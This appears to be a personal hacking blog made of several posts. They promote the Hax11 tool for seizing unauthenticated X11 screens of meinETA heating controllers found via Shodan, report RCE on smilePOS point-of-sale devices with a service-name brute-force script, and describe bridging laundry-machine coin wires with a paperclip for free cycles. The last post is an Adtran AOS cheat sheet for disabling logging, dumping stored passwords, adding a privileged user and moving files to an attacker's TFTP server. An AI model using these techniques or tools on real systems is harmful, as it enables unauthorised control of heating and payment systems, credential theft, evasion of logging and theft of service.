Heating control system meinETA open to attack with Hax11

meinETA is a heating control system that can be accessed remotely via a password protected portal, however since it uses X11 to expose the GUI to the user, if you can get the IP of the meinETA system this portal can be bypassed and you can manipulate the system directly with Hax11 as seen below.

The ETA site says this about meinETA:

meinETA: the free internet platform
If your heating boiler is connected to the internet, you can see and change all heating settings on your mobile, tablet or PC. So you always have a handle on your heating, wherever you are! When you login to www.meinETA.at, you see the touchscreen as if you were standing right in front of the boiler!

This means that with Hax11 you have full control of the system, without the need for the portal, just needing the systems IP. This would seem to be a big hurdal, but a few minutes on shodan and you can track systems down and be in full control with just a few keystrokes and clicks of the mouse. There doesn't seem to be any sort of authentication on the GUI, not even a pin code so there is nothing stopping you once you locate one. 

More on ETA

Get Hax11 HERE

Update to Hax11 allows connect to more display ports for larger attack surface

 I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 "port 6000", but now you can connect to any a system has available. 

Example:

If you want to connect to display 1 "port 6001" use this command:

python hax11.py ip.addr.here 1

If you want to connect to display 0 use the old command style:

python hax11.py ip.addr.here

You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it doubles or more your attack surface. So while the change is small, the impact is big. 

Get it HERE

Enjoy! 

smilePOS RCE via MS .NET Remoting

While searching the internets for MS .NET Remoting deployments to test my service name brute force script, I stumbled on a gem. 

While testing I noticed a lot of systems with port 9099 was vulnerable to MS .NET Remoting abuse that also had a web port with a smilePOS login page served up. First I ever heard of this, so a quick Google search suggested these were a POS device of sorts, this made sense since all the ones I had found had all the same ports and services running. 

So with a bit more looking around I could confirm RCE on all found smilePOS devices, 2021.1.2103.0 is the only version tested. The service names my tool were able to identify are r1 and r2. If anyone has something to add please let me know, otherwise enjoy.

Automate brute forcing service names in vulnerable MS .NET Remoting deployments.

As anyone who is familiar with exploiting a MS .NET Remoting service, they know finding the correct service name can be a pain without the source code. If you don't know what it is Google is a good place to start. The tool ExploitRemotingService makes the job a snap, but it still has the limitation of needing the right service name, and brute forcing by hand is just crazy. 

I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched github for MS .NET Remoting apps and added the names they were using as well. Then coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm with a few bugs. 

Still I thought it could be a nice tool to have in your bag of holding so I am made it available on github. I hope someone gets use of it. 

Usage: ./bfNET ip.addr port

Get it here

Getting free cycles out of coin operated laundry machines

 A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playin with tech and machines so she asked if we could figure out how to get the coins out. I explained that would be a bad idea as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door with a lock on top of the housing for the coin mechanism had a tubal lock as seen below:

So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:

As you can see it's just a few wires, I figured this was our access point to free cycles. You can see the white bracket to connect the coin functions to the machine as seen below:

So I disconnected them, and since there's only two wires, I figured a simple bridge of the two would likely give me the results I was hoping for. I then grabbed a paperclip to bridge them and just like that we had free cycles! Here is what it looked like:

Now you just reconnect the wires, put the door back on, lock, and push start. I gave the paperclip, and tubular pick to my buddy so she can have free cycles at any place with greedy landlords. It was a fun little project and I was happy to help out.

Useful AOS (Adtran OS) CLI commands and tips for pentesting

Below is some junk for AOS you might find useful in a pentest.

 CLI cmds:

Turns on privileged commands "all below commands assume enable command executed with success":

enable

Disable logging for session

no events all 

From here for easy hacking and if the system is in a DMZ, hanging off the inet or the proper ports are exposed, just enable the http server and continue from there. 

configure terminal

http server 80 

If you cant access the http server the cmds below should help get some info out of the system. 

Lists users and PWs

show running-config | include username #displays usernames and passwords.

Add new user with op privs

configure terminal 

username operator privilege 10 password unencrypted passwd1

List IPs

show ip interfaces

Download a file to target system *after running cmd below you will be promoted for more data and you will need an tftp server running that is accessible by the target"

copy tftp flash "or cflash"

Download file from target to your system 

copy flash tftp

 View vpns name and preshared keys

show crypto ike remote-id

 View vpns configs *below cmd should give all client configs, you add the name at end to view only that names config

show crypto ike congratulation pool

 View vpns policy

show crypto ike policy 

TCL script to set up a VPN in the AOS CLI  with walk through:

https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf

AOS CLI reference:

 https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf

If you have anything to add please hit me up and let me know, i would love to see this grow!

Hax11 updated!

Hax11 has been updated to work on the latest kali and its still a target rich envirometn out there folks! Get it HERE and get to hax0rin :)